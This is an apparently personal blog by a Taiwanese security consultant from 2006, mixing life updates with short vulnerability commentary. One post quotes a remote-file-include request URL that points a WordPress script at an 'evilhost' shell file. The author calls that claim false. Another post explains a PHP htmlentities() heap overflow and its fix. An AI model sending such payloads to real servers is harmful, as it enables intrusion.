免錢 PS3
想要免錢的 PS3 嗎 ?
拿下 http://ps3.shimpinomori.net/index_en.html 就有了
眾黑鬼們快上啊 ~
新增留言 2006-11-29 11:52
November, 2006 的文章
Study-Area 2006 群英會
今年的主題是 『資安』
報名網址在 http://samc.study-area.org/sa2006/
由於會場關係, 據說人數有限, 有興趣的人請趕快 ~
講師陣容很堅強, 無一不是台灣資安界的名人, Topic 也都是近年來非常熱的話題 -
| TT | 網路技術當紅炸子雞 AJAX 會帶來什麼危險? |
| Winggy | Unix 資安通論 |
| PK | 電腦鑑識與應變經驗談 |
| TimHsu | Linux Kernel Security Overview |
| Birdman | Defeating Spyware and Rootkit with Behavior Based Techniques |
沒意外的話, 當天我也會到場
歡迎大家找我喝茶 :>
新增留言 2006-11-29 11:49
It's time to leave the group
As the title says, I think it's time to leave the group .
Because there are something... maybe a little sensitive, so I express it in english, Someone involve with the team, or concern about me may try to “decode” my poor english, but others will just pass it .
bestcrypt
到公司上班, 難免會有一些機密資料
會怕一旦筆記型電腦、或隨身碟不見時, 流出去就麻煩了
於是開始找一些加密資料的 Solution ...
Wordpress 2.0.5 Remote File Include Vulnerability
有在留意安全消息的人, 最近可能會看到這個標題然後嚇一跳 -
『 Wordpress functions.php remote file include vulnerability 』
ex: http://www.securityfocus.com/bid/21004
啥 !? Wordpress 這麼多人用的 blog 系統,
連最新的 2.0.5 都還有這麼大的洞洞 !?
原發表者指出可以用
http://www.target.com/wp-includes/functions.php?file=http://evilhost/shell.txt
讓 server 去執行遠端的檔案,
理論上如果成立的話就可以直接拿到 shell .
........ !!
哈, 免驚, 其實這是個芭樂 !
My Third Notebook
來公司兩個星期後, 配發的 Notebook 下來了,
還是全新的 剛送來 由我親手拆封 ~
雖然標題寫 Third Notebook, 但實際上也不算我的,
只是在職期間歸我用就是 XD
[轉載] 我和合租美眉的往事
看標題,一定很多人以為是某類的文學 XD
不過仔細看完後,會發現作者在情感的描寫上相當細膩,且完全沒有標題會引人想像的那部份 ...
只覺得像部精采的短劇,結束後還讓人深刻記得其中的情節,
甚至不由自主的思考,如果是自己遇到時,會如何抉擇 ?
PHP < 5.2.0 Buffer Overflows in htmlspecialchars() and htmlentities()
htmlspecialchars() 及 htmlentities() ,
是 php web programmer 常用的 function
用來將某些網頁特殊字元, 轉換成相對應的 HTML entities ,
例如 < = < 、 > = > 、 ” = " ... 等等,
同時它們也常用來防止網頁產生 XSS 漏洞.
幾日前,
國外的 Hardened-PHP Project 發現這兩個 function 存在 heap overflow 的漏洞 ,
可能導致遠端惡意使用者執行任意指令.
不過這只有在特定情況下 - 當使用 UTF-8 charset 時, 才會發生 .
原因在於 htmlentities 的實作 , PHP source code 的 ext/standard/html.c 中
PHPAPI char *php_escape_html_entities( .... )
{
....
....
if (len + 9 > maxlen)
replaced = erealloc (replaced, maxlen += 128);
...
...
}
當轉換用的 buffer , 再塞 10 bytes 資料會到底的話, 就會 realloc 多 128 bytes .
這本來也沒什麼問題, 因為一般的 HTML entities 都在 8 個字元以下 ,
但有個例外 - Greek character set 會超過 !
所以當惡意的攻擊者塞入特定的字元 ( Greek character set、或來自 0×00, 0xc0-0xfd ) 後,
可能導致 server 端在 realloc() 時發生 heap overflow ,
而執行到其中的惡意代碼 ( 加檔案、開後門、塞木馬、... 等等都有可能 )
解決方式 -
目前 PHP 官方放出的最新版 5.2.0 已經修正了這個問題 ,
而也只有這個版本的 PHP 不受影響 , 其他 < 5.2.0 的通通有可能爆 ...
( 以下為個人看法, 未經實驗, 請自行承擔後果 :> )
真的不想冒然衝上 5.2 的話 , 也可以將之前的版本手動 patch 一遍,
將 5.2.0 裡 ext/standard/html.c 中的 php_escape_html_entities( ) 整個搬過去舊版的
再 recompile 一隻起來 , 應該就沒事了 :p
相關報導 -
http://www.securitytracker.com/alerts/2006/Nov/1017152.html
http://www.hardened-php.net/advisory_132006.138.html
2 則留言 2006-11-07 12:27
台北新生活 !
上個月, 經由長輩的引薦,
到內湖科學園區某間大 SI 公司面試,
結果頗令人滿意 ...
於是上星期接到人事通知錄取後, 就開始積極的找房子,
並在確認住處後三天 ,11/4 時 正式搬上來台北 .
感謝我的母親、姊姊、姊夫, 以及在台北的朋友 Avex ,
不辭辛勞前來幫我一起搬家,
不然把整車的行囊抬上沒有電梯的 6F , 我大概會癱在床上三天 .......
住的地方在內湖路二段, 達人女中 再過去一點 ....
離公司不遠, 視交通狀況, 騎車到公司約 5~10 分鐘 .
房間蠻大的, 一房一廳一衛, 總空間大約有 10+ 坪,
剛好適合我這種常會把傢俱東搬西橋的人 ...
花了兩點稍微把書桌、電腦桌、以及睡的地方安頓好後,
其他東西就先擺著了 .... 有空再整理吧 !
有效率的中華電信, 在我申請(11/4)後的隔兩天(11/6),
就來裝機了 ...
所以一裝好電腦就可以愉快的用網路了 :D [大心]
anyway, 11/6(一) 時, 正式到公司來到職 !
大公司果然不一樣 ,
整個上午都在忙著看一大堆文件、條約 ...
以及繳交所需要的資料 ...
填到名片印製申請單時, 在職稱上我猶豫了一下 ....
雖然待的 team 是屬於 『 資安顧問 』 ,
但我只不過是個大學剛畢業的小毛頭 , 實在不覺得自己有這種資格 ......
其實我也沒想過畢業後第一份工作就會直接進 Security 領域 ,
畢竟才接觸它大約一年多 ....
本來還以為會先往系統、網管方便發展, 偶爾安插一些程式設計 ,
等再過個幾年才轉往資安領域 ....
不過它一直是我的興趣, 且既然有這個機會,
就好好努力吧 !
心中打定主意, 要趕快學習相關知識, 不要造成同事、主管的困擾 ....
更重要的是, 不要讓推薦我的學長覺得看錯人 XD
第一天上班的晚上, 和七八個同事去吃飯,
依照這公司的傳統, 煙可以不抽, 但酒一定要會喝 !
於是就東敬西敬, 喝掉了一堆酒 ...... :'(
九點多回家後, 感覺茫茫的 .... 就直接先臥倒床舖了 ....
睡飽飽到隔天早上七點...
雖然公司採責任制, 上下班都不用打卡,
但新人還是安份點 ....
迅速洗個澡, 上班,
然後在這裡寫日記 XD
2 則留言 2006-11-07 09:43
上網預約 免費共乘搭小黃 95-10-31
會不會以後有人專門坐計程車認識美眉 .... XD
【2006/10/31 聯合報】 記者(陳俍任/台北報導)
尖峰時刻,「運將」免費到府接送上下班,交通部幫您埋單!別懷疑,上周四起到明天,台北市內湖科學園區的上班族就有這種「好康」,只要上網預約,上車時填寫一份共乘制研究問卷,就有機會可免費享受專車接送。
原來這是交通部為促進交通順暢、減少環境汙染,編了五百萬元經費,委託淡江大學運輸研究所執行的都會區共乘系統計畫。計畫主持人淡大教授陶治中指出,特別挑選上下班擠到爆的內科園區做為實驗地,透過衛星動態共乘系統,幫同一路線的上班族配對,配對好的民眾可免費搭計程車上、下班。
這項計畫共簽下十輛計程車合作,淡大運研所在十月廿六日就發出宣傳單,載明網址,說明只要上網登錄資料,就可接受預約配對,有免費計程車載你上下班,但不少人以為是詐騙集團新花招,隨手扔掉。
陶治中說,在國外早就在推動私人運具共乘,但國內因涉及隱私權等問題,六年前曾推過計程車共乘計畫失敗,如今結合手機、衛星定位等科技順勢推動此計畫,初期選定內科實驗,未來不排除全面推廣,將來還要成立「配對部落格」。
這項免費搭計程車的好康只到明天,網址為 http://163.13.218.19/,至於後天起到十一月十七日,雖然不再免費,但只要事先預約,上車填問卷還可享受折扣。
新增留言 2006-11-02 04:58